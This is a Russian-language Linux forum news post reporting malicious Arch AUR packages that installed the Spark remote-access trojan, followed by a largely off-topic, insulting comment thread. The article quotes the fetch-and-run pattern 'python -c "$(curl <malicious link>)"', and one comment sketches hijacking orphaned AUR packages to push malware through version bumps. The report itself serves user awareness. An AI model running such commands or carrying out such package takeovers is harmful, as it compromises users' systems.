LINUX.ORG.RU

В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

 , , ,


1

3

В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.

В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.

Вредоносный пакет был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.

Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.

>>> Подробности

★★★★★

Проверено: leave ()
Последнее исправление: leave (всего исправлений: 1)
Ответ на: комментарий от LightDiver

Откуда ты вообще можешь знать зачем мне этот клиент, почему я его пользую?

Потому, что ты банально не умеешь, или не знаешь, как по другому :) Ты давай, еще про питон расскажи нам, про «протухшие библиотеки» в дистрибутивах. Может, в процессе (хотя я не уверен), тебе расскажут о рабочем окружении, про pip и так далее. там, глядишь, ты откроешь для себя cursor или vscode, узнаешь про плагины к ним-да много еще чего может случиться. Оно - вау-еще и iq подтянешь выше 10…. А там- глядишь и «альтернативные клиенты телеграмм» у тебя будут крутиться не 100 гиговом контейнере… Это все конечно - мечты. Все это -врядли произойдет и ты так и будешь уверен, что в актуальном дебиане питон версии 2, а клиенты телеги должны весить 100 гигабайт в контейнере :) И это - прекрасно. Именно такие люди питают всех людей предприимчивых. Таких - должно быть -как можно больше. Плодись и размножайся- лично поучай «мудрости жизни» потомство. Такие как ты не должны вымирать ! :)

DrRulez ★★★★★
()
Ответ на: комментарий от LightDiver

Хотя, я уже подумываю о своем клиенте. Что нибудь минималистичное.

Неужто будет весить 99 гигов ? :)

DrRulez ★★★★★
()
Ответ на: комментарий от DrRulez

Как pip отменят то, что в дистрибутиве неюзабельное говно? Ну, то есть не просто там со сбоями или непротестированное, а просто устаревшее до степени невозможности использовать?

Ну давай, расскажи нам.

Я могу все скачать сторонними инструментами, могу собрать даже из исходников все сам вручную. Только вопрос возникает, а нахера мне такой диструбутив?

Нахрена я вообще с тобой беседую? Ты же в принципе не вдупляешь сути. Все, хватит офтопить. Общаться с виндузятником о практике использования линукса на десктопах - это наверное из разряда психического расстройства. Я сам дурак.

LightDiver ★★★★★
()
Последнее исправление: LightDiver (всего исправлений: 2)
Ответ на: комментарий от LightDiver

Я сам дурак.

Первая твоя правильная мысль. Следующим шагом должно стать понимание того, что если контейнер с клиентом банального мессенджера весит 100гигов-значит там что-то не так.

Потом(возможно) должно прийти понимание того, как строится и развивается любой нормальный дистрибутив и почему там те, или иные версии библиотек.

Потом, должно дойти, что ЛЮБАЯ ОС - это инструмент. Которым надо пользоваться по назначению и исходя из задач. А не ездить в булочную на самосвале БЕЛАЗ и не вытаскивать занозу из пальца с помощью слесарных клещей.

Это все с тобой, по идее-должно произойти. Но это-не точно…

DrRulez ★★★★★
()
Ответ на: комментарий от XMPP

В snap уже было дофига криптовых псевдокошельков с предустановленным трояном, которые сливали ключи, или что-то такое.

Во флатпаке, как попытка решения этой проблемы, есть механизм подтверждения авторства, что дескать билд сделан не абы кем, но это тоже так себе защита.

ynn
()
Ответ на: комментарий от hatred

Вообще многие сильно недооценивают синдром неуловимого Джо. Я создал акаунт на рутрекере в 2009, пароль был - двойной ник.

В этом году у меня угнали акаунт.

16 лет ушло, чтобы просто дважды написать мой ник вместо пароля. Акаунт то я воостановил, просто написав админам и даже не помня нихрена данных, но всеравно забавно.

LightDiver ★★★★★
()
Ответ на: комментарий от LightDiver

Это понятно, просто последнее время озвучишь какую-то дичь. Оппа: что-то подобное сделали. А так сколько за пивом разговоров было про AUR и как пихнуть туда зловреда. Особенно интересно, когда автор вёл пакет, а потом его бросает («Сирота»), тут под шумок можно «повеселиться» над теми, у кого он поставлен: засунуть что нужно, бампнуть версию, кто пользуется автообновлялками, может даже не заметить.

hatred ★★★
()
Ответ на: комментарий от hatred

Я к тому, что безопасность и линукс сейчас - это вещи максимально удаленные друг от друга, потому что с одной стороны линукс нахер никому не нужен был из авторов зловредов, а с другой, никто в рамках десктопа этой безопасностью и не занимался, потому что - а нахрена.

Если прямо сейчас линукс получит большую популярность, поимеет большие же проблемы. Именно арч как раз популярность и набирает - стимдек. Именно с ним и начали «работать», но то пока так, херня.

Посмотрим чего будет дальше.

LightDiver ★★★★★
()

я waterfox-bin использую.. вроде все нормально у меня cachyOS

slondat
()
Последнее исправление: slondat (всего исправлений: 1)
Ответ на: комментарий от seiken

Если того, который используется для разработки для серьёзных дядь, зачастую удобнее иметь одинаковый дистр и на серваке, и на десктопе.

А смысл?

anc ★★★★★
()
Ответ на: комментарий от DrRulez

Пробовали. Увы. Линукс - непригоден для полноценной офисной работы на данный момент.

Ну линуксовый десктоп не виноват что у кого-то руки из жопы.

На кой художник репин мне и моим сотрудникам подстраивать свои задачи под ОС

Интересно что же это за мегазадачи такие. Что-то я сомневаюсь что ты со своими сотрудниками в каком-нибудь адово дорогом проприетарном пакете у которого лицензия на одного юзера стоит как десяток тысяч виндоуз рассчитываете какие-нибудь авиакосмические турбины или ядерные реакторы. Но если так - то твои задачи далеко выходят за рамки среднего пользователя компа и являются как раз адовой экзотикой. Даже в супертехнологичных аэроспейсах на одного инженера-проектировщика приходится десяток если не два сейлов, закупщиков, бухгалтеров, кадровиков и работяг потребности которых за глаза закроет линуксовый десктоп.

Qui-Gon ★★★★★
()
Ответ на: комментарий от DrRulez

Ты не отрицаешь нужность десктопа?

Как до луны - одним местом. Любому линукс-дистрибутиву. Проще говоря в том виде, в котором он сейчас - он - даром не нужен и нормальным людям - не уперся.

Куча окружающего меня народу на работе пользует и это самые обычные пользаки.

anc ★★★★★
()

а кто их туда загрузил-то? имя, фамилия, адрес.

alysnix ★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.